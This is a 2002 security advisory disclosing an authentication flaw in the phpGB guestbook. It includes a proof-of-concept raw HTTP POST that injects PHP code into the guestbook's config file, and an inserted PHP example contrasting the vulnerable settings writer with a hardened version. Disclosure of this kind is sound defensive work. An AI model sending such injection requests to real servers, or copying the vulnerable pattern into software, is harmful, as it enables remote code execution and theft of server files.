Sep 10, 2002 - 12:00 a.m.

phpGB: DoS and executing arbitrary commands



ppp-design found the following design error in phpGB:

Details


Product: phpGB
Affected Version: 1.20 and maybe all versions before
Immune Version: 1.30
OS affected: all OS with php
Vendor-URL: http://www.walzl.net
Vendor-Status: informed, new version available
Security-Risk: high - very high
Remote-Exploit: Yes

Introduction


phpGB is a PHP/MySQL based guestbook. The admin can change all settings
through a PHP interface. Unfortunately the script lacks correct
authentication, so anybody is able to overwrite a config file,
which leads to a DoS or to running arbitrary PHP commands on the server.

More details


The problem is in /admins/savesettings.php. The only authentication
check is a test that the page was requested via POST. That is why it is
very easy to fake authentication and to write anything to
/include/config.php. Because this is a central file of the software,
included on nearly every page, a syntax error in it leads to a DoS of
the whole guestbook. A further security aspect is the ability to insert
arbitrary commands into the config file: if the inserted code avoids
syntax errors, an attacker is able to execute any PHP command on the
server.
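The settings-writer pattern described above, beside a hardened form, as an added example that is not phpGB's own code (the function names, the $_SESSION['is_admin'] flag, the config path and the php -l parse check are assumptions; the field names are those from the advisory):

```php
<?php
// Added example, not phpGB's own code. Function names, the $_SESSION['is_admin']
// flag and the config path are assumptions; the field names come from the advisory.
// The pattern the advisory describes: the request method is the only check, and
// submitted values are pasted verbatim into a PHP source file.
function save_settings_vulnerable(array $post, string $path): void
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        exit('POST only');                          // any client can satisfy this
    }
    $src = "<?php\n\$dbpassword = \"{$post['dbpassword']}\";\n";
    file_put_contents($path, $src);                // a quote in the value closes the string
}

// Hardened: admin session required, values emitted as PHP literals via var_export()
// so a quote cannot close the string, and the file is syntax-checked before use.
function render_config(array $settings): string
{
    $src = "<?php\n";
    foreach ($settings as $name => $value) {
        if (!preg_match('/^[a-z_][a-z0-9_]*$/i', $name)) {
            throw new InvalidArgumentException("bad setting name: $name");
        }
        $src .= '$' . $name . ' = ' . var_export($value, true) . ";\n";
    }
    return $src;
}

function save_settings_hardened(array $post, string $path): bool
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST' || empty($_SESSION['is_admin'])) {
        http_response_code(403);
        return false;
    }
    $allowed = ['dbpassword', 'toolbar', 'messenger', 'smileys', 'title',
                'db_session_handler', 'all_in_one'];
    $settings = [];
    foreach ($allowed as $key) {
        $settings[$key] = (string)($post[$key] ?? '');
    }
    $tmp = $path . '.tmp';
    file_put_contents($tmp, render_config($settings));
    exec('php -l ' . escapeshellarg($tmp), $output, $rc);   // assumes php CLI on PATH
    if ($rc !== 0) {
        unlink($tmp);
        return false;                                       // never install a broken config
    }
    return rename($tmp, $path);                              // atomic swap into place
}
```

With the advisory's dbpassword value, render_config() emits `$dbpassword = '";phpinfo();$a="';`, a plain string literal rather than executable code, and a value that still produced invalid PHP would be rejected by the parse check instead of taking the guestbook down.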

Proof-of-concept


After running the following proof of concept, you are presented with
phpinfo() on every page of the guestbook. Of course you can insert any
php code instead of phpinfo(); into /include/config.php. (\n is newline)

telnet example.com 80\n
POST /phpGB/admin/savesettings.php HTTP/1.0\n
Content-Type: application/x-www-form-urlencoded\n
Content-Length: 123\n
\n
dbpassword=%22%3Bphpinfo%28%29%3B%24a%3D%22&toolbar=1
&messenger=1&smileys=1&title=1&db_session_handler=0
&all_in_one=0&test=\n
\n

Temporary-fix


Use .htaccess to restrict access to admin pages.

Fix


Use at least phpGB 1.30.

Security-Risk


Because an attacker is able to execute any PHP command, he is able to
read all files, including .htaccess or .htpasswd files or any password
protected pages. Depending on system security he might be able to run
any shell command on the server. That is why we rate this security
issue as high to very high.

Vendor status


After we informed the author, he needed about 12 hours to release a new
version.

Disclaimer


All information that can be found in this advisory is believed to be
true, but maybe it isn't. ppp-design cannot be held responsible for
the use or misuse of this information. Redistribution of this text is
only permitted if the text has not been altered and the original
author ppp-design (http://www.ppp-design.de) is mentioned.

This advisory can be found online:
http://www.ppp-design.de/advisories.php


ppp-design
http://www.ppp-design.de
Public-Key: http://www.ppp-design.de/pgp/ppp-design.asc
Fingerprint: 5B02 0AD7 A176 3A4F CE22 745D 0D78 7B60 B3B5 451A